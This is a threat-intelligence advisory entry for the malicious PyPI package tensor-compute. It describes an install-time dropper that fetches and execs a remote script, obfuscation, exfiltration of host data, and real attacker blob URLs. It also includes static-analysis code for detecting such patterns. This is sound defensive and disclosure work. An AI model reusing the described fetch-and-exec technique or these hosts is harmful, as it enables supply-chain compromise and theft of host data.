
Supply-chain threat intelligence

Incident detail

critical · pypi · credential theft · osv

Malicious code in tensor-compute (PyPI)

tensor-compute

Risk score

92

AI summary

Indexed incident for tensor-compute (pypi).

Description


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (9a3d1b50077a6311a43061891fa560d2c180fbdbd12ab4965e0d265910e6ef68)

tensor-compute@1.0.0 presents itself as a Rust-backed tensor library but is a dropper. setup.py registers a custom build_ext command (src/build_ext.py) whose run() invokes RustBuildContext.build() → collect_version_cache(), which uses urllib3 (with TLS warnings disabled) to GET https://odifkwepasasf.blob.core.windows.net/share/standalone.py and executes the response body via exec() in a background daemon thread during pip install. No integrity verification is performed (a sha256 is computed but never compared). The shipped stage-2 (standalone.py, also present in obfuscated form as standalonobf.py via base85+zlib+XOR with a strong_combined_obfuscator header) checks a SHA-256 hostname/domain allowlist, then collects hostname, FQDN, USER/DOMAIN, OS, arch, Python version, username, and resolved IP, XOR-encodes them, and exfiltrates to https://telemetry021312.blob.core.windows.net/share/tensor-compute?v= with a spoofed Chrome User-Agent. Cover-story signals reinforce intent: tensor_core.c is a stub, simulate_rust_compilation() forges ELF/Mach-O/MZ headers to fake a native build, and pyproject.toml/setup.cfg carry placeholder author metadata (Your Name, your.email@example.com, yourusername).

Source: kam193 (65d708cc1f7f21e95b09b365734e06251c59f931bf07ff7fbb004713064bcae7)

The package performs a targeted attack on specific environments. While building the native extension and on import, the code attempts to download and execute code from a remote location. Access to the remote code is filtered. In another place, the code performs basic exfiltration after verifying the environment it executes in.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-tensor-compute

Reasons (based on the campaign):

  • targetted-attack

  • Downloads and executes a remote malicious script.

  • obfuscation

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
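The build_ext → network fetch → exec() chain described above can be triaged statically before anything is installed. The following is an added example, not code from the package or from either source: an AST check over unpacked sdist sources that never executes them. The signal names, the `audit_source`/`audit_package` helpers, the module lists and the sample files (with a placeholder URL) are all assumptions constructed for illustration.

```python
import ast

# Heuristic lists chosen for this example; extend them for real triage.
NET_MODULES = {"urllib3", "urllib", "requests", "http", "socket"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}

def audit_source(name, source):
    """Statically list install-time red flags in one file (parsed, never run)."""
    findings = set()
    for node in ast.walk(ast.parse(source, filename=name)):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        if any(m.split(".")[0] in NET_MODULES for m in mods):
            findings.add("network-import")
        if not isinstance(node, ast.Call):
            continue
        fn = node.func
        if isinstance(fn, ast.Name) and fn.id in DYNAMIC_EXEC:
            findings.add("dynamic-exec")
        if isinstance(fn, ast.Attribute) and fn.attr == "disable_warnings":
            findings.add("tls-warnings-disabled")
        for kw in node.keywords:
            if kw.arg == "cmdclass":
                findings.add("custom-build-command")
            if kw.arg == "daemon" and getattr(kw.value, "value", None) is True:
                findings.add("daemon-thread")
    return sorted(findings)

def audit_package(files):
    """Return (per-file findings, verdict) for a {path: source} mapping."""
    report = {path: audit_source(path, src) for path, src in files.items()}
    hooks_build = any("custom-build-command" in f for f in report.values())
    fetch_exec = any({"network-import", "dynamic-exec"} <= set(f) for f in report.values())
    return report, hooks_build and fetch_exec

# Constructed sample mirroring the described layout; placeholder URL, not an IoC.
SAMPLE = {
    "setup.py": "from setuptools import setup\nfrom src.build_ext import BuildExt\n"
                "setup(name='demo', cmdclass={'build_ext': BuildExt})\n",
    "src/build_ext.py": "import threading, urllib3\nurllib3.disable_warnings()\n"
                        "def fetch():\n"
                        "    body = urllib3.PoolManager().request('GET', 'https://example.invalid/s.py').data\n"
                        "    exec(body)\n"
                        "threading.Thread(target=fetch, daemon=True).start()\n",
}

if __name__ == "__main__":
    print(audit_package(SAMPLE))
```

The verdict is true only when a package both overrides a build command and has a file that combines a network import with dynamic execution; a custom `cmdclass` alone is common in legitimate native-extension packages and is not flagged.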

Technical details

Affected versions


Indicators

  • affected_version 75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
